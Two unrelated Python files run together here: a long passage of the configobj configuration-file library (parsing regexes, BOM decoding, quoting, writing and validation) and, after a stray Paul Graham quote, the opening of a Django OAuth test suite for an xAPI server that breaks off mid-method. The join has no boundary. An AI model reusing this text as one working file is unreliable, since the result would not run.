(\s*) # 1: indentation ((?:\[\s*)+) # 2: section marker open ( # 3: section name open (?:"\s*\S.*?\s*")| # at least one non-space with double quotes (?:'\s*\S.*?\s*')| # at least one non-space with single quotes (?:[^'"\s].*?) # at least one non-space unquoted ) # section name close ((?:\s*\])+) # 4: section marker close \s*(\#.*)? # 5: optional comment $''', re.VERBOSE) # this regexp pulls list values out as a single string # or single values and comments # FIXME: this regex adds a '' to the end of comma terminated lists # workaround in ``_handle_value`` _valueexp = re.compile(r'''^ (?: (?: ( (?: (?: (?:".*?")| # double quotes (?:'.*?')| # single quotes (?:[^'",\#][^,\#]*?) # unquoted ) \s*,\s* # comma )* # match all list items ending in a comma (if any) ) ( (?:".*?")| # double quotes (?:'.*?')| # single quotes (?:[^'",\#\s][^,]*?)| # unquoted (?:(?<!,)) # Empty value )? # last item in a list - or string value )| (,) # alternatively a single comma - empty list ) \s*(\#.*)? # optional comment $''', re.VERBOSE) # use findall to get the members of a list value _listvalueexp = re.compile(r''' ( (?:".*?")| # double quotes (?:'.*?')| # single quotes (?:[^'",\#]?.*?) # unquoted ) \s*,\s* # comma ''', re.VERBOSE) # this regexp is used for the value # when lists are switched off _nolistvalue = re.compile(r'''^ ( (?:".*?")| # double quotes (?:'.*?')| # single quotes (?:[^'"\#].*?)| # unquoted (?:) # Empty value ) \s*(\#.*)? # optional comment $''', re.VERBOSE) # regexes for finding triple quoted values on one line _single_line_single = re.compile(r"^'''(.*?)'''\s*(#.*)?$") _single_line_double = re.compile(r'^"""(.*?)"""\s*(#.*)?$') _multi_line_single = re.compile(r"^(.*?)'''\s*(#.*)?$") _multi_line_double = re.compile(r'^(.*?)"""\s*(#.*)?$') _triple_quote = { "'''": (_single_line_single, _multi_line_single), '"""': (_single_line_double, _multi_line_double), } # Used by the ``istrue`` Section method _bools = { 'yes': True, 'no': False, 'on': True, 'off': False, '1': True, '0': False, 'true': True, 'false': False, } def __init__(self, infile=None, options=None, configspec=None, encoding=None, interpolation=True, raise_errors=False, list_values=True, create_empty=False, file_error=False, stringify=True, indent_type=None, default_encoding=None, unrepr=False, write_empty_values=False, _inspec=False): """ Parse a config file or create a config file object. ``ConfigObj(infile=None, configspec=None, encoding=None, interpolation=True, raise_errors=False, list_values=True, create_empty=False, file_error=False, stringify=True, indent_type=None, default_encoding=None, unrepr=False, write_empty_values=False, _inspec=False)`` """ self._inspec = _inspec # init the superclass Section.__init__(self, self, 0, self) infile = infile or [] _options = {'configspec': configspec, 'encoding': encoding, 'interpolation': interpolation, 'raise_errors': raise_errors, 'list_values': list_values, 'create_empty': create_empty, 'file_error': file_error, 'stringify': stringify, 'indent_type': indent_type, 'default_encoding': default_encoding, 'unrepr': unrepr, 'write_empty_values': write_empty_values} if options is None: options = _options else: import warnings warnings.warn('Passing in an options dictionary to ConfigObj() is ' 'deprecated. Use **options instead.', DeprecationWarning, stacklevel=2) # TODO: check the values too. for entry in options: if entry not in OPTION_DEFAULTS: raise TypeError('Unrecognised option "%s".' % entry) for entry, value in list(OPTION_DEFAULTS.items()): if entry not in options: options[entry] = value keyword_value = _options[entry] if value != keyword_value: options[entry] = keyword_value # XXXX this ignores an explicit list_values = True in combination # with _inspec. The user should *never* do that anyway, but still... if _inspec: options['list_values'] = False self._initialise(options) configspec = options['configspec'] self._original_configspec = configspec self._load(infile, configspec) def _load(self, infile, configspec): if isinstance(infile, six.string_types): self.filename = infile if os.path.isfile(infile): with open(infile, 'rb') as h: content = h.readlines() or [] elif self.file_error: # raise an error if the file doesn't exist raise IOError('Config file not found: "%s".' % self.filename) else: # file doesn't already exist if self.create_empty: # this is a good test that the filename specified # isn't impossible - like on a non-existent device with open(infile, 'w') as h: h.write('') content = [] elif isinstance(infile, (list, tuple)): content = list(infile) elif isinstance(infile, dict): # initialise self # the Section class handles creating subsections if isinstance(infile, ConfigObj): # get a copy of our ConfigObj def set_section(in_section, this_section): for entry in in_section.scalars: this_section[entry] = in_section[entry] for section in in_section.sections: this_section[section] = {} set_section(in_section[section], this_section[section]) set_section(infile, self) else: for entry in infile: self[entry] = infile[entry] del self._errors if configspec is not None: self._handle_configspec(configspec) else: self.configspec = None return elif getattr(infile, 'read', MISSING) is not MISSING: # This supports file like objects content = infile.read() or [] # needs splitting into lines - but needs doing *after* decoding # in case it's not an 8 bit encoding else: raise TypeError('infile must be a filename, file like object, or list of lines.') if content: # don't do it for the empty ConfigObj content = self._handle_bom(content) # infile is now *always* a list # # Set the newlines attribute (first line ending it finds) # and strip trailing '\n' or '\r' from lines for line in content: if (not line) or (line[-1] not in ('\r', '\n')): continue for end in ('\r\n', '\n', '\r'): if line.endswith(end): self.newlines = end break break assert all(isinstance(line, six.string_types) for line in content), repr(content) content = [line.rstrip('\r\n') for line in content] self._parse(content) # if we had any errors, now is the time to raise them if self._errors: info = "at line %s." % self._errors[0].line_number if len(self._errors) > 1: msg = "Parsing failed with several errors.\nFirst error %s" % info error = ConfigObjError(msg) else: error = self._errors[0] # set the errors attribute; it's a list of tuples: # (error_type, message, line_number) error.errors = self._errors # set the config attribute error.config = self raise error # delete private attributes del self._errors if configspec is None: self.configspec = None else: self._handle_configspec(configspec) def _initialise(self, options=None): if options is None: options = OPTION_DEFAULTS # initialise a few variables self.filename = None self._errors = [] self.raise_errors = options['raise_errors'] self.interpolation = options['interpolation'] self.list_values = options['list_values'] self.create_empty = options['create_empty'] self.file_error = options['file_error'] self.stringify = options['stringify'] self.indent_type = options['indent_type'] self.encoding = options['encoding'] self.default_encoding = options['default_encoding'] self.BOM = False self.newlines = None self.write_empty_values = options['write_empty_values'] self.unrepr = options['unrepr'] self.initial_comment = [] self.final_comment = [] self.configspec = None if self._inspec: self.list_values = False # Clear section attributes as well Section._initialise(self) def __repr__(self): def _getval(key): try: return self[key] except MissingInterpolationOption: return dict.__getitem__(self, key) return ('ConfigObj({%s})' % ', '.join([('%s: %s' % (repr(key), repr(_getval(key)))) for key in (self.scalars + self.sections)])) def _handle_bom(self, infile): """ Handle any BOM, and decode if necessary. If an encoding is specified, that *must* be used - but the BOM should still be removed (and the BOM attribute set). (If the encoding is wrongly specified, then a BOM for an alternative encoding won't be discovered or removed.) If an encoding is not specified, UTF8 or UTF16 BOM will be detected and removed. The BOM attribute will be set. UTF16 will be decoded to unicode. NOTE: This method must not be called with an empty ``infile``. Specifying the *wrong* encoding is likely to cause a ``UnicodeDecodeError``. ``infile`` must always be returned as a list of lines, but may be passed in as a single string. """ if ((self.encoding is not None) and (self.encoding.lower() not in BOM_LIST)): # No need to check for a BOM # the encoding specified doesn't have one # just decode return self._decode(infile, self.encoding) if isinstance(infile, (list, tuple)): line = infile[0] else: line = infile if isinstance(line, six.text_type): # it's already decoded and there's no need to do anything # else, just use the _decode utility method to handle # listifying appropriately return self._decode(infile, self.encoding) if self.encoding is not None: # encoding explicitly supplied # And it could have an associated BOM # TODO: if encoding is just UTF16 - we ought to check for both # TODO: big endian and little endian versions. enc = BOM_LIST[self.encoding.lower()] if enc == 'utf_16': # For UTF16 we try big endian and little endian for BOM, (encoding, final_encoding) in list(BOMS.items()): if not final_encoding: # skip UTF8 continue if infile.startswith(BOM): ### BOM discovered ##self.BOM = True # Don't need to remove BOM return self._decode(infile, encoding) # If we get this far, will *probably* raise a DecodeError # As it doesn't appear to start with a BOM return self._decode(infile, self.encoding) # Must be UTF8 BOM = BOM_SET[enc] if not line.startswith(BOM): return self._decode(infile, self.encoding) newline = line[len(BOM):] # BOM removed if isinstance(infile, (list, tuple)): infile[0] = newline else: infile = newline self.BOM = True return self._decode(infile, self.encoding) # No encoding specified - so we need to check for UTF8/UTF16 for BOM, (encoding, final_encoding) in list(BOMS.items()): if not isinstance(line, six.binary_type) or not line.startswith(BOM): # didn't specify a BOM, or it's not a bytestring continue else: # BOM discovered self.encoding = final_encoding if not final_encoding: self.BOM = True # UTF8 # remove BOM newline = line[len(BOM):] if isinstance(infile, (list, tuple)): infile[0] = newline else: infile = newline # UTF-8 if isinstance(infile, six.text_type): return infile.splitlines(True) elif isinstance(infile, six.binary_type): return infile.decode('utf-8').splitlines(True) else: return self._decode(infile, 'utf-8') # UTF16 - have to decode return self._decode(infile, encoding) if six.PY2 and isinstance(line, str): # don't actually do any decoding, since we're on python 2 and # returning a bytestring is fine return self._decode(infile, None) # No BOM discovered and no encoding specified, default to UTF-8 if isinstance(infile, six.binary_type): return infile.decode('utf-8').splitlines(True) else: return self._decode(infile, 'utf-8') def _a_to_u(self, aString): """Decode ASCII strings to unicode if a self.encoding is specified.""" if isinstance(aString, six.binary_type) and self.encoding: return aString.decode(self.encoding) else: return aString def _decode(self, infile, encoding): """ Decode infile to unicode. Using the specified encoding. if is a string, it also needs converting to a list. """ if isinstance(infile, six.string_types): return infile.splitlines(True) if isinstance(infile, six.binary_type): # NOTE: Could raise a ``UnicodeDecodeError`` if encoding: return infile.decode(encoding).splitlines(True) else: return infile.splitlines(True) if encoding: for i, line in enumerate(infile): if isinstance(line, six.binary_type): # NOTE: The isinstance test here handles mixed lists of unicode/string # NOTE: But the decode will break on any non-string values # NOTE: Or could raise a ``UnicodeDecodeError`` infile[i] = line.decode(encoding) return infile def _decode_element(self, line): """Decode element to unicode if necessary.""" if isinstance(line, six.binary_type) and self.default_encoding: return line.decode(self.default_encoding) else: return line # TODO: this may need to be modified def _str(self, value): """ Used by ``stringify`` within validate, to turn non-string values into strings. """ if not isinstance(value, six.string_types): # intentially 'str' because it's just whatever the "normal" # string type is for the python version we're dealing with return str(value) else: return value def _parse(self, infile): """Actually parse the config file.""" temp_list_values = self.list_values if self.unrepr: self.list_values = False comment_list = [] done_start = False this_section = self maxline = len(infile) - 1 cur_index = -1 reset_comment = False while cur_index < maxline: if reset_comment: comment_list = [] cur_index += 1 line = infile[cur_index] sline = line.strip() # do we have anything on the line ? if not sline or sline.startswith('#'): reset_comment = False comment_list.append(line) continue if not done_start: # preserve initial comment self.initial_comment = comment_list comment_list = [] done_start = True reset_comment = True # first we check if it's a section marker mat = self._sectionmarker.match(line) if mat is not None: # is a section line (indent, sect_open, sect_name, sect_close, comment) = mat.groups() if indent and (self.indent_type is None): self.indent_type = indent cur_depth = sect_open.count('[') if cur_depth != sect_close.count(']'): self._handle_error("Cannot compute the section depth", NestingError, infile, cur_index) continue if cur_depth < this_section.depth: # the new section is dropping back to a previous level try: parent = self._match_depth(this_section, cur_depth).parent except SyntaxError: self._handle_error("Cannot compute nesting level", NestingError, infile, cur_index) continue elif cur_depth == this_section.depth: # the new section is a sibling of the current section parent = this_section.parent elif cur_depth == this_section.depth + 1: # the new section is a child the current section parent = this_section else: self._handle_error("Section too nested", NestingError, infile, cur_index) continue sect_name = self._unquote(sect_name) if sect_name in parent: self._handle_error('Duplicate section name', DuplicateError, infile, cur_index) continue # create the new section this_section = Section( parent, cur_depth, self, name=sect_name) parent[sect_name] = this_section parent.inline_comments[sect_name] = comment parent.comments[sect_name] = comment_list continue # # it's not a section marker, # so it should be a valid ``key = value`` line mat = self._keyword.match(line) if mat is None: self._handle_error( 'Invalid line ({0!r}) (matched as neither section nor keyword)'.format(line), ParseError, infile, cur_index) else: # is a keyword value # value will include any inline comment (indent, key, value) = mat.groups() if indent and (self.indent_type is None): self.indent_type = indent # check for a multiline value if value[:3] in ['"""', "'''"]: try: value, comment, cur_index = self._multiline( value, infile, cur_index, maxline) except SyntaxError: self._handle_error( 'Parse error in multiline value', ParseError, infile, cur_index) continue else: if self.unrepr: comment = '' try: value = unrepr(value) except Exception as e: if type(e) == UnknownType: msg = 'Unknown name or type in value' else: msg = 'Parse error from unrepr-ing multiline value' self._handle_error(msg, UnreprError, infile, cur_index) continue else: if self.unrepr: comment = '' try: value = unrepr(value) except Exception as e: if isinstance(e, UnknownType): msg = 'Unknown name or type in value' else: msg = 'Parse error from unrepr-ing value' self._handle_error(msg, UnreprError, infile, cur_index) continue else: # extract comment and lists try: (value, comment) = self._handle_value(value) except SyntaxError: self._handle_error( 'Parse error in value', ParseError, infile, cur_index) continue # key = self._unquote(key) if key in this_section: self._handle_error( 'Duplicate keyword name', DuplicateError, infile, cur_index) continue # add the key. # we set unrepr because if we have got this far we will never # be creating a new section this_section.__setitem__(key, value, unrepr=True) this_section.inline_comments[key] = comment this_section.comments[key] = comment_list continue # if self.indent_type is None: # no indentation used, set the type accordingly self.indent_type = '' # preserve the final comment if not self and not self.initial_comment: self.initial_comment = comment_list elif not reset_comment: self.final_comment = comment_list self.list_values = temp_list_values def _match_depth(self, sect, depth): """ Given a section and a depth level, walk back through the sections parents to see if the depth level matches a previous section. Return a reference to the right section, or raise a SyntaxError. """ while depth < sect.depth: if sect is sect.parent: # we've reached the top level already raise SyntaxError() sect = sect.parent if sect.depth == depth: return sect # shouldn't get here raise SyntaxError() def _handle_error(self, text, ErrorClass, infile, cur_index): """ Handle an error according to the error settings. Either raise the error or store it. The error will have occured at ``cur_index`` """ line = infile[cur_index] cur_index += 1 message = '{0} at line {1}.'.format(text, cur_index) error = ErrorClass(message, cur_index, line) if self.raise_errors: # raise the error - parsing stops here raise error # store the error # reraise when parsing has finished self._errors.append(error) def _unquote(self, value): """Return an unquoted version of a value""" if not value: # should only happen during parsing of lists raise SyntaxError if (value[0] == value[-1]) and (value[0] in ('"', "'")): value = value[1:-1] return value def _quote(self, value, multiline=True): """ Return a safely quoted version of a value. Raise a ConfigObjError if the value cannot be safely quoted. If multiline is ``True`` (default) then use triple quotes if necessary. * Don't quote values that don't need it. * Recursively quote members of a list and return a comma joined list. * Multiline is ``False`` for lists. * Obey list syntax for empty and single member lists. If ``list_values=False`` then the value is only quoted if it contains a ``\\n`` (is multiline) or '#'. If ``write_empty_values`` is set, and the value is an empty string, it won't be quoted. """ if multiline and self.write_empty_values and value == '': # Only if multiline is set, so that it is used for values not # keys, and not values that are part of a list return '' if multiline and isinstance(value, (list, tuple)): if not value: return ',' elif len(value) == 1: return self._quote(value[0], multiline=False) + ',' return ', '.join([self._quote(val, multiline=False) for val in value]) if not isinstance(value, six.string_types): if self.stringify: # intentially 'str' because it's just whatever the "normal" # string type is for the python version we're dealing with value = str(value) else: raise TypeError('Value "%s" is not a string.' % value) if not value: return '""' no_lists_no_quotes = not self.list_values and '\n' not in value and '#' not in value need_triple = multiline and ((("'" in value) and ('"' in value)) or ('\n' in value )) hash_triple_quote = multiline and not need_triple and ("'" in value) and ('"' in value) and ('#' in value) check_for_single = (no_lists_no_quotes or not need_triple) and not hash_triple_quote if check_for_single: if not self.list_values: # we don't quote if ``list_values=False`` quot = noquot # for normal values either single or double quotes will do elif '\n' in value: # will only happen if multiline is off - e.g. '\n' in key raise ConfigObjError('Value "%s" cannot be safely quoted.' % value) elif ((value[0] not in wspace_plus) and (value[-1] not in wspace_plus) and (',' not in value)): quot = noquot else: quot = self._get_single_quote(value) else: # if value has '\n' or "'" *and* '"', it will need triple quotes quot = self._get_triple_quote(value) if quot == noquot and '#' in value and self.list_values: quot = self._get_single_quote(value) return quot % value def _get_single_quote(self, value): if ("'" in value) and ('"' in value): raise ConfigObjError('Value "%s" cannot be safely quoted.' % value) elif '"' in value: quot = squot else: quot = dquot return quot def _get_triple_quote(self, value): if (value.find('"""') != -1) and (value.find("'''") != -1): raise ConfigObjError('Value "%s" cannot be safely quoted.' % value) if value.find('"""') == -1: quot = tdquot else: quot = tsquot return quot def _handle_value(self, value): """ Given a value string, unquote, remove comment, handle lists. (including empty and single member lists) """ if self._inspec: # Parsing a configspec so don't handle comments return (value, '') # do we look for lists in values ? if not self.list_values: mat = self._nolistvalue.match(value) if mat is None: raise SyntaxError() # NOTE: we don't unquote here return mat.groups() # mat = self._valueexp.match(value) if mat is None: # the value is badly constructed, probably badly quoted, # or an invalid list raise SyntaxError() (list_values, single, empty_list, comment) = mat.groups() if (list_values == '') and (single is None): # change this if you want to accept empty values raise SyntaxError() # NOTE: note there is no error handling from here if the regex # is wrong: then incorrect values will slip through if empty_list is not None: # the single comma - meaning an empty list return ([], comment) if single is not None: # handle empty values if list_values and not single: # FIXME: the '' is a workaround because our regex now matches # '' at the end of a list if it has a trailing comma single = None else: single = single or '""' single = self._unquote(single) if list_values == '': # not a list value return (single, comment) the_list = self._listvalueexp.findall(list_values) the_list = [self._unquote(val) for val in the_list] if single is not None: the_list += [single] return (the_list, comment) def _multiline(self, value, infile, cur_index, maxline): """Extract the value, where we are in a multiline situation.""" quot = value[:3] newvalue = value[3:] single_line = self._triple_quote[quot][0] multi_line = self._triple_quote[quot][1] mat = single_line.match(value) if mat is not None: retval = list(mat.groups()) retval.append(cur_index) return retval elif newvalue.find(quot) != -1: # somehow the triple quote is missing raise SyntaxError() # while cur_index < maxline: cur_index += 1 newvalue += '\n' line = infile[cur_index] if line.find(quot) == -1: newvalue += line else: # end of multiline, process it break else: # we've got to the end of the config, oops... raise SyntaxError() mat = multi_line.match(line) if mat is None: # a badly formed line raise SyntaxError() (value, comment) = mat.groups() return (newvalue + value, comment, cur_index) def _handle_configspec(self, configspec): """Parse the configspec.""" # FIXME: Should we check that the configspec was created with the # correct settings ? (i.e. ``list_values=False``) if not isinstance(configspec, ConfigObj): try: configspec = ConfigObj(configspec, raise_errors=True, file_error=True, _inspec=True) except ConfigObjError as e: # FIXME: Should these errors have a reference # to the already parsed ConfigObj ? raise ConfigspecError('Parsing configspec failed: %s' % e) except IOError as e: raise IOError('Reading configspec failed: %s' % e) self.configspec = configspec def _set_configspec(self, section, copy): """ Called by validate. Handles setting the configspec on subsections including sections to be validated by __many__ """ configspec = section.configspec many = configspec.get('__many__') if isinstance(many, dict): for entry in section.sections: if entry not in configspec: section[entry].configspec = many for entry in configspec.sections: if entry == '__many__': continue if entry not in section: section[entry] = {} section[entry]._created = True if copy: # copy comments section.comments[entry] = configspec.comments.get(entry, []) section.inline_comments[entry] = configspec.inline_comments.get(entry, '') # Could be a scalar when we expect a section if isinstance(section[entry], Section): section[entry].configspec = configspec[entry] def _write_line(self, indent_string, entry, this_entry, comment): """Write an individual line, for the write method""" # NOTE: the calls to self._quote here handles non-StringType values. if not self.unrepr: val = self._decode_element(self._quote(this_entry)) else: val = repr(this_entry) return '%s%s%s%s%s' % (indent_string, self._decode_element(self._quote(entry, multiline=False)), self._a_to_u(' = '), val, self._decode_element(comment)) def _write_marker(self, indent_string, depth, entry, comment): """Write a section marker line""" return '%s%s%s%s%s' % (indent_string, self._a_to_u('[' * depth), self._quote(self._decode_element(entry), multiline=False), self._a_to_u(']' * depth), self._decode_element(comment)) def _handle_comment(self, comment): """Deal with a comment.""" if not comment: return '' start = self.indent_type if not comment.startswith('#'): start += self._a_to_u(' # ') return (start + comment) # Public methods def write(self, outfile=None, section=None): """ Write the current ConfigObj as a file tekNico: FIXME: use StringIO instead of real files >>> filename = a.filename >>> a.filename = 'test.ini' >>> a.write() >>> a.filename = filename >>> a == ConfigObj('test.ini', raise_errors=True) 1 >>> import os >>> os.remove('test.ini') """ if self.indent_type is None: # this can be true if initialised from a dictionary self.indent_type = DEFAULT_INDENT_TYPE out = [] cs = self._a_to_u('#') csp = self._a_to_u('# ') if section is None: int_val = self.interpolation self.interpolation = False section = self for line in self.initial_comment: line = self._decode_element(line) stripped_line = line.strip() if stripped_line and not stripped_line.startswith(cs): line = csp + line out.append(line) indent_string = self.indent_type * section.depth for entry in (section.scalars + section.sections): if entry in section.defaults: # don't write out default values continue for comment_line in section.comments[entry]: comment_line = self._decode_element(comment_line.lstrip()) if comment_line and not comment_line.startswith(cs): comment_line = csp + comment_line out.append(indent_string + comment_line) this_entry = section[entry] comment = self._handle_comment(section.inline_comments[entry]) if isinstance(this_entry, Section): # a section out.append(self._write_marker( indent_string, this_entry.depth, entry, comment)) out.extend(self.write(section=this_entry)) else: out.append(self._write_line( indent_string, entry, this_entry, comment)) if section is self: for line in self.final_comment: line = self._decode_element(line) stripped_line = line.strip() if stripped_line and not stripped_line.startswith(cs): line = csp + line out.append(line) self.interpolation = int_val if section is not self: return out if (self.filename is None) and (outfile is None): # output a list of lines # might need to encode # NOTE: This will *screw* UTF16, each line will start with the BOM if self.encoding: out = [l.encode(self.encoding) for l in out] if (self.BOM and ((self.encoding is None) or (BOM_LIST.get(self.encoding.lower()) == 'utf_8'))): # Add the UTF8 BOM if not out: out.append('') out[0] = BOM_UTF8 + out[0] return out # Turn the list to a string, joined with correct newlines newline = self.newlines or os.linesep if (getattr(outfile, 'mode', None) is not None and outfile.mode == 'w' and sys.platform == 'win32' and newline == '\r\n'): # Windows specific hack to avoid writing '\r\r\n' newline = '\n' output = self._a_to_u(newline).join(out) if not output.endswith(newline): output += newline if isinstance(output, six.binary_type): output_bytes = output else: output_bytes = output.encode(self.encoding or self.default_encoding or 'ascii') if self.BOM and ((self.encoding is None) or match_utf8(self.encoding)): # Add the UTF8 BOM output_bytes = BOM_UTF8 + output_bytes if outfile is not None: outfile.write(output_bytes) else: with open(self.filename, 'wb') as h: h.write(output_bytes) def validate(self, validator, preserve_errors=False, copy=False, section=None): """ Test the ConfigObj against a configspec. It uses the ``validator`` object from *validate.py*. To run ``validate`` on the current ConfigObj, call: :: test = config.validate(validator) (Normally having previously passed in the configspec when the ConfigObj was created - you can dynamically assign a dictionary of checks to the ``configspec`` attribute of a section though). It returns ``True`` if everything passes, or a dictionary of pass/fails (True/False). If every member of a subsection passes, it will just have the value ``True``. (It also returns ``False`` if all members fail). In addition, it converts the values from strings to their native types if their checks pass (and ``stringify`` is set). If ``preserve_errors`` is ``True`` (``False`` is default) then instead of a marking a fail with a ``False``, it will preserve the actual exception object. This can contain info about the reason for failure. For example the ``VdtValueTooSmallError`` indicates that the value supplied was too small. If a value (or section) is missing it will still be marked as ``False``. You must have the validate module to use ``preserve_errors=True``. You can then use the ``flatten_errors`` function to turn your nested results dictionary into a flattened list of failures - useful for displaying meaningful error messages. """ if section is None: if self.configspec is None: raise ValueError('No configspec supplied.') if preserve_errors: # We do this once to remove a top level dependency on the validate module # Which makes importing configobj faster from validate import VdtMissingValue self._vdtMissingValue = VdtMissingValue section = self if copy: section.initial_comment = section.configspec.initial_comment section.final_comment = section.configspec.final_comment section.encoding = section.configspec.encoding section.BOM = section.configspec.BOM section.newlines = section.configspec.newlines section.indent_type = section.configspec.indent_type # # section.default_values.clear() #?? configspec = section.configspec self._set_configspec(section, copy) def validate_entry(entry, spec, val, missing, ret_true, ret_false): section.default_values.pop(entry, None) try: section.default_values[entry] = validator.get_default_value(configspec[entry]) except (KeyError, AttributeError, validator.baseErrorClass): # No default, bad default or validator has no 'get_default_value' # (e.g. SimpleVal) pass try: check = validator.check(spec, val, missing=missing ) except validator.baseErrorClass as e: if not preserve_errors or isinstance(e, self._vdtMissingValue): out[entry] = False else: # preserve the error out[entry] = e ret_false = False ret_true = False else: ret_false = False out[entry] = True if self.stringify or missing: # if we are doing type conversion # or the value is a supplied default if not self.stringify: if isinstance(check, (list, tuple)): # preserve lists check = [self._str(item) for item in check] elif missing and check is None: # convert the None from a default to a '' check = '' else: check = self._str(check) if (check != val) or missing: section[entry] = check if not copy and missing and entry not in section.defaults: section.defaults.append(entry) return ret_true, ret_false # out = {} ret_true = True ret_false = True unvalidated = [k for k in section.scalars if k not in configspec] incorrect_sections = [k for k in configspec.sections if k in section.scalars] incorrect_scalars = [k for k in configspec.scalars if k in section.sections] for entry in configspec.scalars: if entry in ('__many__', '___many___'): # reserved names continue if (not entry in section.scalars) or (entry in section.defaults): # missing entries # or entries from defaults missing = True val = None if copy and entry not in section.scalars: # copy comments section.comments[entry] = ( configspec.comments.get(entry, [])) section.inline_comments[entry] = ( configspec.inline_comments.get(entry, '')) # else: missing = False val = section[entry] ret_true, ret_false = validate_entry(entry, configspec[entry], val, missing, ret_true, ret_false) many = None if '__many__' in configspec.scalars: many = configspec['__many__'] elif '___many___' in configspec.scalars: many = configspec['___many___'] if many is not None: for entry in unvalidated: val = section[entry] ret_true, ret_false = validate_entry(entry, many, val, False, ret_true, ret_false) unvalidated = [] for entry in incorrect_scalars: ret_true = False if not preserve_errors: out[entry] = False else: ret_false = False msg = 'Value %r was provided as a section' % entry out[entry] = validator.baseErrorClass(msg) for entry in incorrect_sections: ret_true = False if not preserve_errors: out[entry] = False else: ret_false = False msg = 'Section %r was provided as a single value' % entry out[entry] = validator.baseErrorClass(msg) # Missing sections will have been created as empty ones when the # configspec was read. for entry in section.sections: # FIXME: this means DEFAULT is not copied in copy mode if section is self and entry == 'DEFAULT': continue if section[entry].configspec is None: unvalidated.append(entry) continue if copy: section.comments[entry] = configspec.comments.get(entry, []) section.inline_comments[entry] = configspec.inline_comments.get(entry, '') check = self.validate(validator, preserve_errors=preserve_errors, copy=copy, section=section[entry]) out[entry] = check if check == False: ret_true = False elif check == True: ret_false = False else: ret_true = False section.extra_values = unvalidated if preserve_errors and not section._created: # If the section wasn't created (i.e. it wasn't missing) # then we can't return False, we need to preserve errors ret_false = False # if ret_false and preserve_errors and out: # If we are preserving errors, but all # the failures are from missing sections / values # then we can return False. Otherwise there is a # real failure that we need to preserve. ret_false = not any(out.values()) if ret_true: return True elif ret_false: return False return out def reset(self): """Clear ConfigObj instance and restore to 'freshly created' state.""" self.clear() self._initialise() # FIXME: Should be done by '_initialise', but ConfigObj constructor (and reload) # requires an empty dictionary self.configspec = None # Just to be sure ;-) self._original_configspec = None def reload(self): """ Reload a ConfigObj from file. This method raises a ``ReloadError`` if the ConfigObj doesn't have a filename attribute pointing to a file. """ if not isinstance(self.filename, six.string_types): raise ReloadError() filename = self.filename current_options = {} for entry in OPTION_DEFAULTS: if entry == 'configspec': continue current_options[entry] = getattr(self, entry) configspec = self._original_configspec current_options['configspec'] = configspec self.clear() self._initialise(current_options) self._load(filename, configspec) class SimpleVal(object): """ A simple validator. Can be used to check that all members expected are present. To use it, provide a configspec with all your members in (the value given will be ignored). Pass an instance of ``SimpleVal`` to the ``validate`` method of your ``ConfigObj``. ``validate`` will return ``True`` if all members are present, or a dictionary with True/False meaning present/missing. (Whole missing sections will be replaced with ``False``) """ def __init__(self): self.baseErrorClass = ConfigObjError def check(self, check, member, missing=False): """A dummy check method, always returns the value unchanged.""" if missing: raise self.baseErrorClass() return member def flatten_errors(cfg, res, levels=None, results=None): """ An example function that will turn a nested dictionary of results (as returned by ``ConfigObj.validate``) into a flat list. ``cfg`` is the ConfigObj instance being checked, ``res`` is the results dictionary returned by ``validate``. (This is a recursive function, so you shouldn't use the ``levels`` or ``results`` arguments - they are used by the function.) Returns a list of keys that failed. Each member of the list is a tuple:: ([list of sections...], key, result) If ``validate`` was called with ``preserve_errors=False`` (the default) then ``result`` will always be ``False``. *list of sections* is a flattened list of sections that the key was found in. If the section was missing (or a section was expected and a scalar provided - or vice-versa) then key will be ``None``. If the value (or section) was missing then ``result`` will be ``False``. If ``validate`` was called with ``preserve_errors=True`` and a value was present, but failed the check, then ``result`` will be the exception object returned. You can use this as a string that describes the failure. For example *The value "3" is of the wrong type*. """ if levels is None: # first time called levels = [] results = [] if res == True: return sorted(results) if res == False or isinstance(res, Exception): results.append((levels[:], None, res)) if levels: levels.pop() return sorted(results) for (key, val) in list(res.items()): if val == True: continue if isinstance(cfg.get(key), dict): # Go down one level levels.append(key) flatten_errors(cfg[key], val, levels, results) continue results.append((levels[:], key, val)) # # Go up one level if levels: levels.pop() # return sorted(results) def get_extra_values(conf, _prepend=()): """ Find all the values and sections not in the configspec from a validated ConfigObj. ``get_extra_values`` returns a list of tuples where each tuple represents either an extra section, or an extra value. The tuples contain two values, a tuple representing the section the value is in and the name of the extra values. For extra values in the top level section the first member will be an empty tuple. For values in the 'foo' section the first member will be ``('foo',)``. For members in the 'bar' subsection of the 'foo' section the first member will be ``('foo', 'bar')``. NOTE: If you call ``get_extra_values`` on a ConfigObj instance that hasn't been validated it will return an empty list. """ out = [] out.extend([(_prepend, name) for name in conf.extra_values]) for name in conf.sections: if name not in conf.extra_values: out.extend(get_extra_values(conf[name], _prepend + (name,))) return out """*A programming language is a medium of expression.* - Paul Graham"""
import uuid import json import urllib import os import base64 import time import string import random import oauth2 as oauth from Crypto.PublicKey import RSA from django.conf import settings from django.contrib.auth.models import User from django.core.urlresolvers import reverse from django.test import TestCase from ..views import reg_client, register, statements from ..models import Activity, Agent from oauth_provider.models import Consumer, Token, Nonce from oauth_provider.utils import SignatureMethod_RSA_SHA1 # Django client uses testserver TEST_SERVER = 'http://testserver' INITIATE_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/initiate" AUTHORIZATION_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/authorize" TOKEN_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/token" class OAuthTests(TestCase): @classmethod def setUpClass(cls): print "\n%s" % __name__ def setUp(self): if not settings.OAUTH_ENABLED: settings.OAUTH_ENABLED = True # Create a user self.user = User.objects.create_user('jane', '[email protected]', 'toto') self.client.login(username='jane', password='toto') #Register a consumer self.name = "test jane client" self.desc = "test jane client desc" form = {"name":self.name, "description":self.desc} self.client.post(reverse(reg_client),form) self.consumer = Consumer.objects.get(name=self.name) self.name2jane = "test jane client2" self.desc2jane = "test jane client desc2" form2jane = {"name":self.name2jane, "description":self.desc2jane} self.client.post(reverse(reg_client),form2jane) self.consumer2jane = Consumer.objects.get(name=self.name2jane) self.client.logout() self.jane_auth = "Basic %s" % base64.b64encode("%s:%s" % ('jane','toto')) # Create a user self.user2 = User.objects.create_user('dick', '[email protected]', 'lassie') self.client.login(username='dick', password='lassie') #Register a client self.name2 = "test client2" self.desc2 = "test desc2" form2 = {"name":self.name2, "description":self.desc2} self.client.post(reverse(reg_client),form2) self.consumer2 = Consumer.objects.get(name=self.name2) self.client.logout() self.dick_auth = "Basic %s" % base64.b64encode("%s:%s" % ('dick','lassie')) def tearDown(self): if settings.OAUTH_ENABLED: 